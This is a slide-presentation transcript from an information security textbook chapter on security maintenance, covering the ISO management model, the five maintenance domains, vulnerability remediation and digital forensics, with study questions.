What is the objective of the planning and risk assessment domain of the maintenance model?

Presentation on theme: "Information Security Maintenance"— Presentation transcript:

1 Information Security Maintenance
Principles of Information Security Chapter 12

2 Topic Objectives The need for ongoing system maintenance
Discuss The need for ongoing system maintenance Security management/maintenance models Monitoring external and internal environment Planning and Risk Assessment Vulnerability Assessment and Remediation Readiness and Review Procedures Digital forensics Managing potential evidentiary material

3

4 Need for Ongoing Maintenance
Things change! business priorities business partnerships and organizational structure employee turnover assets threats vulnerabilities Ongoing change within the organization and the technology environment must be addressed and integrated into the overall security plan.

5 System Management and Maintenance Models
ISO Network Management Model Focuses on methods to manage and operate systems Modified to support requirements for information security porgrams Security Maintenance Model Focuses on methods to maintain systems

6 Modified ISO Network Management Model
Structured approach to administration and management of networks and systems Modified to support tasks in information security programs Fault Management Configuration and Change Management Accounting and Auditing Management Performance Management Security Program Management

7 ISO Model - Fault Management
Traditional model technology focus process of identifying, tracking, diagnosing, and resolving faults in system Info Sec model includes people and technology --- includes nontechnical issues identifying faults and remediating them fault detection vulnerability assessments, penetration testing fault correction taking appropriate action to eliminate or mitigate faults monitoring and resolution of user complaints possible indicators of faults, weaknesses, or intrusions - Help Desk trouble tickets provide mechanism for documenting, monitoring and tracking problem resolution knowledge base of common problems and solutions

8 ISO Model - Configuration and Change Management
Addresses both technical and nontechnical changes Nontechnical Change Management - maintenance of policies and procedures Configuration Management Administration of the configuration of the components of the security program Change Management Administration of changes in the strategy, operation, or components of the information security program.

9 ISO Model - Technical Configuration and Change Management
Monitor and administer changes to technical components of information systems 4 Steps for Configuration Management Configuration Identification Identify/document configuration items Configuration control Administer changes and revisions (by developing organization) Configuration status accounting Track and record change implementations Configuration audit audit configuration management program

10 ISO Model - Accounting and Auditing Management
Chargeback Accounting provides mechanism for tracking use of resources charge internal departments for system use examples: cpu cycle time (rarely used), computing system resources, network architect and software engineer development time allows recovery of IT expenses from non-IT units Accounting management involves monitoring use of particular component of a system Auditing Review system usage to determine whether misuse or malfeasance has occurred use computer-generated activity logs; log analyzers detects unusual behavior, hacking attempts, etc. configure duplicate logs and offline storage

11 ISO Model - Performance Management
Monitor information security system performance network devices, firewalls, proxy servers, content filters performance factors to evaluate: memory usage, cpu usage, network traffic, data storage Use established performance baselines to: detect abnormal levels of activity identify performance shortfalls that should be addressed by upgrades

12 ISO Model - Security Program Management
Formal management standards relevant to information security programs (there is a fee to obtain these standards) ISO (previously ISO 17799) Code of Practice for Information Security Management ISO (previously BS 7799 Part 2) Provides the process model described below Plan-Do-Check-Act process Plan Perform risk analysis of vulnerabilities Do Apply internal controls to manage risk Check Perform periodic/frequent reviews to verify effectiveness Act Develop incident response plans as necessary

13 Information Security Maintenance Model
Focus on maintaining systems 5 Areas/Domains External Monitoring Internal Monitoring Planning and Risk Assessment Vulnerability Assessment and Remediation Readiness and Review

14 Maintenance Model

15 Maintenance Model - Monitoring the External Environment
Goal: Maintain awareness of changing external threats. Provide early detection of new and emerging threats, threat agents, vulnerabilities, and attacks Collect external intelligence from available data sources CERT web site vendors public internet sites Provide intelligence context and meaning for use by decision makers within the organization Characteristics of an effective external monitoring program: Creates documented and repeatable procedures Provides proper training Equips staff with proper access and tools Designs criteria and cultivates expertise Develops suitable communications methods Integrates the Incident Response Plan with the results of the external monitoring process Escalates warnings to the internal organization about new threats Monitoring The External Environment The objective of the external monitoring domain within the maintenance model is to provide the early awareness of new and emerging threats, threat agents, vulnerabilities, and attacks that is needed to mount an effective and timely defense. External monitoring entails collecting intelligence from data sources, and then giving that intelligence context and meaning for use by decision makers within the organization.

16 External Monitoring

17 ISM Model - Monitoring the Internal Environment
Goal: maintain informed awareness of the state of the organization’s networks, systems, and defenses by maintaining an inventory of IT infrastructure and applications Accomplished by Maintaining complete inventory of network and IT infrastructure Referred to as characterization of the network Leading IT governance process to integrate changes Performing real-time monitoring of IT activity using intrusion detection systems Prevent risk of attacks in future Identify security weaknesses Detect variances introduced to the network or system hardware and software, e.g., by automated difference-detection methods Monitoring The Internal Environment It is just as important to monitor the external environment as the internal environment, that is the internal computing environment. The primary goal of the internal monitoring domain is to maintain an informed awareness of the state of all of the organization’s networks, information systems, and information security defenses. Building and maintaining an inventory of network devices and channels, IT infrastructure and applications, and information security infrastructure elements Active participation in, or leadership of, the IT governance process within the organization to integrate the inevitable changes found in all network, IT, and information security programs Real-time monitoring of IT activity using intrusion detection systems to detect and initiate responses to specific actions or trends of events that introduce risk to the organization’s assets Periodic monitoring of the internal state of the organization’s networks and systems. This recursive review of the network and system devices that are inline at any given moment and any changes to the services offered on the network is needed to maintain awareness of new and emerging threats. This can be accomplished through automated difference detection methods that identify variances introduced to the network or system hardware and software.

18 Internal Monitoring

19 ISM Model - IT Governance
Goal: increased awareness of the impact of change translated into a description of the risk obtained through operational risk assessment Method: active engagement in an organization-wide IT governance process Awareness of change comes from two components of the IT governance process: Architecture review boards provides orderly introduction of change in information technology IT change control process frequently supervised by change control committee that ensures awareness of change and integration of information security aspects The Role of IT Governance The primary value of active engagement in an organization-wide IT governance process is the increased awareness of the impact of change. This awareness must be translated into a description of the risk that is caused by the change. Such a description is developed in the planning and risk assessment domain of operational risk assessment. Awareness of change that flows from IT governance comes from two primary parts of the IT governance process: Architecture review boards: Many organizations have a group designated for the managed technology planning, review, and approval process that coordinates the acquisition and adoption of new technologies. The group directs the orderly introduction of change in information technology across the organization. IT change control process: Most organizations of appreciable size have implemented one or more mechanisms to control change in the network, IT infrastructure, and IT applications.

20 ISM Model - Planning and Risk Assessment
Monitor the entire information security program Plan ongoing information security activities to further reduce risk Perform risk assessment to identify and document risks introduced by projects and latent risks in the environment document risks introduced by new projects or processes and identify possible controls for these risks Uses periodic reviews Part of organization's strategic planning process and annual capital budget planning cycle. Primary goals are: Establish a formal information security program review process Institute formal project identification, selection, planning, and management processes Introduce risk assessment and review for all IT projects Create a mindset of risk assessment across the organization Planning And Risk Assessment The primary objective of the planning and risk assessment domain is to keep an eye on the entire information security program. This is done in part by identifying and planning ongoing information security activities that further reduce risk. Also, the risk assessment group identifies and documents risks introduced by both IT projects and information security projects. Further, it identifies and documents risks that may be latent in the present environment. The primary outcomes from this domain are: Establishing a formal information security program review process that complements and supports both the IT planning process and strategic planning processes Instituting formal project identification, selection, planning and management processes for information security follow-on activities that augment the current program Coordinating with IT project teams to introduce risk assessment and review for all IT projects, so that risks introduced from the introduction of IT projects are identified, documented, and factored into projects decisions. Integrating a mindset of risk assessment across the organization to encourage the performance of risk assessment activities when any technology system is implemented or modified

21 Planning and Risk Assessment

22 ISM Model - Vulnerability Assessment and Remediation
Goal: identify specific, documented vulnerabilities and perform timely remediation Use effective vulnerability assessment procedures collect intelligence about network, platforms, dial-in modems, and wireless network systems Document background information provide tested remediation procedures for reported vulnerabilities Track and report status of vulnerabilities from time of discovery to remediation or formally accepted Communicate information about vulnerabilities include risk estimates and remediation plans Escalate unremediated vulnerabilities to management obtain management involvement in ultimate decision to accept the risk of loss Vulnerability Assessment And Remediation The primary goal of the vulnerability assessment and remediation domain is the identification of specific, documented vulnerabilities and their timely remediation. This is accomplished by: Using vulnerability assessment procedures which are documented to safely collect intelligence about network, platforms, dial-in modems, and wireless network systems Documenting background information and providing tested remediation procedures for the reported vulnerabilities Tracking, communicating, reporting and escalating to management the itemized facts about the discovered vulnerabilities and the success or failure of the organization to remediate them

23 Vulnerability Assessment Process

24 ISM Model - Remediating Vulnerabilities
Goal: Repair the flaw causing a vulnerability instance or remove the risk (mitigate the risk) from the vulnerability As a last resort, informed decision makers with the proper authority can accept the risk Team approach to remediation is the key to success Remediation Options Acceptance of Risk Must be a conscious decision based on full information and cost-benefit analysis Threat Removal (Prevention) Remove the risk by making the threat impossible to accomplish (use standalone computer, vice networked) Vulnerability Repair preferred option when possible; patches and updates; repair problem causing the vulnerability Remediating Vulnerabilities The objective of remediation is to repair the flaw causing a vulnerability instance or remove the risk from the vulnerability. As a last resort, informed decision makers with the proper authority can accept the risk. When approaching the remediation process, it is important to recognize that building relationships with those who control the information assets is the key to success. Success depends on the organization adopting a team approach to remediation, in place of cross-organizational push and pull.

25 ISM Model - Readiness and Review
Goal: Keep the program functioning as designed and continuously improving Accomplished by: Policy review Periodic review and update to provide a current foundation for the information security program Readiness review Major planning components should be reviewed on a periodic basis to ensure they are current, accurate, and appropriate Rehearsals & War Games Rehearse major plan elements to make sure all participants are capable of responding as needed War games - realistic simulations Readiness And Review The primary goal of the readiness and review domain is to keep the information security program functioning as designed and continuously improving over time. This is accomplished by: Policy review: Sound policy needs to be reviewed and refreshed from time to time to provide a current foundation for the information security program. Readiness review: Major planning components should be reviewed on a periodic basis to ensure they are current, accurate, and appropriate. Rehearsals: When possible, major plan elements should be rehearsed. Policy review is the primary initiator of the readiness and review domain. As policy is revised or current policy is confirmed, the various planning elements are reviewed for compliance, the information security program is reviewed, and rehearsals are held to make sure all participants are capable of responding as needed.

26 Readiness and Review

27 Digital Forensics Digital forensics Evidentiary material (EM)
investigate what happened during attack on assets and how attack occurred Based on the field of traditional forensics Involves preservation, identification, extraction, documentation, and interpretation of computer media for evidentiary and/or root cause analysis Evidentiary material (EM) any information that could potentially support organizations legal or policy-based case against suspect Principles of Information Security, 3rd Edition

28 Digital Forensics (continued)
Used for two key purposes: To investigate allegations of digital malfeasance To perform root cause analysis Organization chooses one of two approaches when using digital forensics: Protect and forget (patch and proceed) focuses on defense of data and systems that house, use, and transmit it Apprehend and prosecute (pursue and prosecute) focuses on identification and apprehension of responsible individuals, with additional attention on collection and preservation of potential EM that might support administrative or criminal prosecution Tools: Principles of Information Security, 3rd Edition

29 Summary Maintenance of information security program is essential
Security management models assist in planning for ongoing operations It is necessary to monitor external and internal environment Planning and risk assessment are essential parts of information security maintenance Need to understand how vulnerability assessment and remediation tie into information security maintenance Need to understand how to build readiness and review procedures into information security maintenance Digital forensics and management of digital forensics function Principles of Information Security, 3rd Edition

What are the five domains of the General information security Maintenance Model?

What is the primary objective of the readiness and review domain of the maintenance model?

What is the primary goal of the vulnerability assessment and remediation?

What are the three primary aspects of information security risk management?